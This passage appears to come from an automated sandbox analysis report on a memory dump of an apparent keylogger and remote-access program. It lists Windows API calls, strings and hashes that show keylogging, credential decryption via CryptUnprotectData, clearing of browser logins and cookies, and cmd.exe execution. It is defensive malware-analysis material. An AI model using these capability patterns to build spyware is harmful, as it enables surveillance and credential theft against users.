                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                  • String ID: Online Keylogger Started
                                                  • API String ID: 112202259-1258561607
                                                  • Opcode ID: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                  • Opcode Fuzzy Hash: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CryptUnprotectData$crypt32
                                                  • API String ID: 2574300362-2380590389
                                                  • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                  • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                  • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                  • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandleObjectSingleWait
                                                  • String ID: Connection Timeout
                                                  • API String ID: 2055531096-499159329
                                                  • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                  • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                  • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                  • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 2005118841-1866435925
                                                  • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                  • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                  • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,004752D8), ref: 00413888
                                                  • RegCloseKey.ADVAPI32(004752D8,?,0040F85E,pth_unenc,004752D8), ref: 00413893
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                  • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                  • String ID: bad locale name
                                                  • API String ID: 3628047217-1405518554
                                                  • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                  • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                  • String ID: !D@
                                                  • API String ID: 3446828153-604454484
                                                  • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                  • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                  • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                  • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: /C $cmd.exe$open
                                                  • API String ID: 587946157-3896048727
                                                  • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                  • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                  APIs
                                                  • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                  • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                  • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: TerminateThread$HookUnhookWindows
                                                  • String ID: pth_unenc
                                                  • API String ID: 3123878439-4028850238
                                                  • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                  • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCursorInfo$User32.dll
                                                  • API String ID: 1646373207-2714051624
                                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetLastInputInfo$User32.dll
                                                  • API String ID: 2574300362-1519888992
                                                  • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                  • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                  • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                  • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                  • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                  • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                  • Opcode Fuzzy Hash: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                  APIs
                                                  Strings
                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                  • API String ID: 3472027048-1236744412
                                                  • Opcode ID: a279e2316e2dcfb013a5f4140dbe47f2552778df508f0a57d0bf660d7fd1389c
                                                  • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                  • Opcode Fuzzy Hash: a279e2316e2dcfb013a5f4140dbe47f2552778df508f0a57d0bf660d7fd1389c
                                                  • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                  APIs
                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$ForegroundLength
                                                  • String ID: [ $ ]
                                                  • API String ID: 3309952895-93608704
                                                  • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                  • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                  • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                  • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                  • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                  • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcess
                                                  • String ID:
                                                  • API String ID: 39102293-0
                                                  • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                  • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                  • String ID:
                                                  • API String ID: 2633735394-0
                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                  • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                  • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                  APIs
